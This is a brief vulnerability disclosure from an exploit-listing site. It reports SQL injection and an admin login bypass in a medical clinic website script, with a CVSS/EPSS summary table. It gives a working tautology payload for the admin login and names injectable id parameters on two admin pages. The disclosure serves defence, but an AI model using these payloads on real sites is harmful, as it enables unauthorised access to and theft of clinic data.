Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
N/A | CWE-89 | Not specified | High |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Unknown | High | Remote | 2017-01-20 |
CVSS | EPSS | EPSSP |
---|---|---|
CVSS:4.0/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H | 0.07022 | 0.60437 |
Medical Clinic Website Script SQL Injection # # # # # # Vulnerability: SQL Injection + Authentication Bypass # Date: 18.01.2017 # Vendor Homepage: http://www.scriptgiant.com/ # Script Name: Medical Clinic Website Script # Script Buy Now: http://www.popularclones.com/products/Medical-Clinic-Website # Author: Ihsan Sencan # Author Web: http://ihsan.net # Mail : ihsan[beygir]ihsan[nokta]net # # # # # # Authentication Bypass : # http://localhost/[PATH]/admin_giant/ and set Username:'or''=' and Password to 'or''=' and hit enter. # SQL Injection/Exploit : # http://localhost/[PATH]/admin_giant/add_gallery.php?id=[SQL] # http://localhost/[PATH]/admin_giant/add_team_member.php?id=[SQL] # E.t.c.... Other files, too. SQL There are security vulnerabilities. # # # # #
Copyright ©2024 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.